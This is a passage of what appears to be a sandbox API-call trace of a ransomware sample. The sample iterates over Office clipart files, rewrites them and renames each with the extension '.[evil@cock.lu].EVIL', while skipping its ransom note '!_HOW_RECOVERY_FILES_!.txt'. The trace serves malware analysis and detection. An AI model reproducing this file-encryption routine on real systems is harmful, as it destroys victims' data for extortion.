CloseHandle (hObject=0x1a8) returned 1 [0166.537] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.537] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.537] __uncaught_exception () returned 0x84b1160800 [0166.537] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.537] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03731_.wmf.[evil@cock.lu].evil")) returned 1 [0166.538] ??_V@YAXPEAX@Z () returned 0x1 [0166.542] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03731_.WMF", dwFileAttributes=0x200) returned 0 [0166.542] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.542] wcsstr (_Str="PE03795_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.542] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF") returned 69 [0166.542] wcscmp (_String1="PE03795_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.542] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE03795_.WMF") returned 0x0 [0166.542] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF") returned 0x45 [0166.542] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.544] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x78a, lpOverlapped=0x0) returned 1 [0166.548] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.548] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.548] _errno () returned 0x84b1160840 [0166.548] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.548] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e24040*, nNumberOfBytesToWrite=0x7a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e24040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7a0, lpOverlapped=0x0) returned 1 [0166.548] CloseHandle (hObject=0x1a8) returned 1 [0166.548] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.548] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.548] __uncaught_exception () returned 0x84b1160800 [0166.548] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.549] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe03795_.wmf.[evil@cock.lu].evil")) returned 1 [0166.549] ??_V@YAXPEAX@Z () returned 0x1 [0166.554] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE03795_.WMF", dwFileAttributes=0x200) returned 0 [0166.554] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.554] wcsstr (_Str="PE04050_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.554] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF") returned 69 [0166.554] wcscmp (_String1="PE04050_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.554] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE04050_.WMF") returned 0x0 [0166.554] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF") returned 0x45 [0166.554] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.557] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1020, lpOverlapped=0x0) returned 1 [0166.560] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.560] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.560] _errno () returned 0x84b1160840 [0166.560] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.560] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2e040*, nNumberOfBytesToWrite=0x1040, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2e040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1040, lpOverlapped=0x0) returned 1 [0166.560] CloseHandle (hObject=0x1a8) returned 1 [0166.560] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.560] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.560] __uncaught_exception () returned 0x84b1160800 [0166.560] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.561] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe04050_.wmf.[evil@cock.lu].evil")) returned 1 [0166.562] ??_V@YAXPEAX@Z () returned 0x1 [0166.565] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE04050_.WMF", dwFileAttributes=0x200) returned 0 [0166.565] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.565] wcsstr (_Str="PE05665_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.565] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF") returned 69 [0166.565] wcscmp (_String1="PE05665_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.565] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE05665_.WMF") returned 0x0 [0166.565] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF") returned 0x45 [0166.565] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.568] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x37f8, lpOverlapped=0x0) returned 1 [0166.571] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.571] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.571] _errno () returned 0x84b1160840 [0166.571] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.571] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x3800, lpOverlapped=0x0) returned 1 [0166.571] CloseHandle (hObject=0x1a8) returned 1 [0166.572] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.572] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.572] __uncaught_exception () returned 0x84b1160800 [0166.572] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.572] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05665_.wmf.[evil@cock.lu].evil")) returned 1 [0166.573] ??_V@YAXPEAX@Z () returned 0x1 [0166.576] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05665_.WMF", dwFileAttributes=0x200) returned 0 [0166.577] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.577] wcsstr (_Str="PE05710_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.577] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF") returned 69 [0166.577] wcscmp (_String1="PE05710_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.577] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE05710_.WMF") returned 0x0 [0166.577] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF") returned 0x45 [0166.577] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.579] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x167c, lpOverlapped=0x0) returned 1 [0166.582] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.582] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.582] _errno () returned 0x84b1160840 [0166.582] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.582] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1680, lpOverlapped=0x0) returned 1 [0166.582] CloseHandle (hObject=0x1a8) returned 1 [0166.582] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.583] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.583] __uncaught_exception () returned 0x84b1160800 [0166.583] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.583] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05710_.wmf.[evil@cock.lu].evil")) returned 1 [0166.584] ??_V@YAXPEAX@Z () returned 0x1 [0166.587] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05710_.WMF", dwFileAttributes=0x200) returned 0 [0166.588] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.588] wcsstr (_Str="PE05869_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.588] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF") returned 69 [0166.588] wcscmp (_String1="PE05869_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.588] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE05869_.WMF") returned 0x0 [0166.588] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF") returned 0x45 [0166.588] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.591] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x608, lpOverlapped=0x0) returned 1 [0166.603] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.603] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.603] _errno () returned 0x84b1160840 [0166.603] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.603] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x620, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x620, lpOverlapped=0x0) returned 1 [0166.604] CloseHandle (hObject=0x1a8) returned 1 [0166.604] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.604] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.604] __uncaught_exception () returned 0x84b1160800 [0166.604] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.604] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05869_.wmf.[evil@cock.lu].evil")) returned 1 [0166.605] ??_V@YAXPEAX@Z () returned 0x1 [0166.609] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05869_.WMF", dwFileAttributes=0x200) returned 0 [0166.609] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.609] wcsstr (_Str="PE05870_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.609] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF") returned 69 [0166.609] wcscmp (_String1="PE05870_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.609] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE05870_.WMF") returned 0x0 [0166.609] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF") returned 0x45 [0166.609] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.611] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x634, lpOverlapped=0x0) returned 1 [0166.615] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.615] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.615] _errno () returned 0x84b1160840 [0166.615] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.615] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x640, lpOverlapped=0x0) returned 1 [0166.615] CloseHandle (hObject=0x1a8) returned 1 [0166.615] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.616] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.616] __uncaught_exception () returned 0x84b1160800 [0166.616] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.616] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05870_.wmf.[evil@cock.lu].evil")) returned 1 [0166.617] ??_V@YAXPEAX@Z () returned 0x1 [0166.620] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05870_.WMF", dwFileAttributes=0x200) returned 0 [0166.620] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.621] wcsstr (_Str="PE05930_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.621] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF") returned 69 [0166.621] wcscmp (_String1="PE05930_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.621] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE05930_.WMF") returned 0x0 [0166.621] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF") returned 0x45 [0166.621] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.623] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x7fce, lpOverlapped=0x0) returned 1 [0166.636] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.636] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.636] _errno () returned 0x84b1160840 [0166.636] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.636] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2d040*, nNumberOfBytesToWrite=0x7fe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2d040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x7fe0, lpOverlapped=0x0) returned 1 [0166.645] CloseHandle (hObject=0x1a8) returned 1 [0166.645] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.645] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.645] __uncaught_exception () returned 0x84b1160800 [0166.645] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0166.646] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe05930_.wmf.[evil@cock.lu].evil")) returned 1 [0166.647] ??_V@YAXPEAX@Z () returned 0x1 [0166.650] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE05930_.WMF", dwFileAttributes=0x200) returned 0 [0166.650] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0166.650] wcsstr (_Str="PE06049_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0166.650] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF") returned 69 [0166.651] wcscmp (_String1="PE06049_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0166.651] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="PE06049_.WMF") returned 0x0 [0166.651] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF") returned 0x45 [0166.651] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\pe06049_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0166.653] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x121c, lpOverlapped=0x0) returned 1 [0166.656] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.656] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0166.656] _errno () returned 0x84b1160840 [0166.656] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0166.656] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x1220, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1220, lpOverlapped=0x0) returned 1 [0166.657] CloseHandle (hObject=0x1a8) returned 1 [0166.657] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\PE06049_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0166.657] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0166.657] __uncaught_exception () returned 0x84b1160800 [0166.657] fclose (in: _File=0x7ffc020ee2a0 | out: 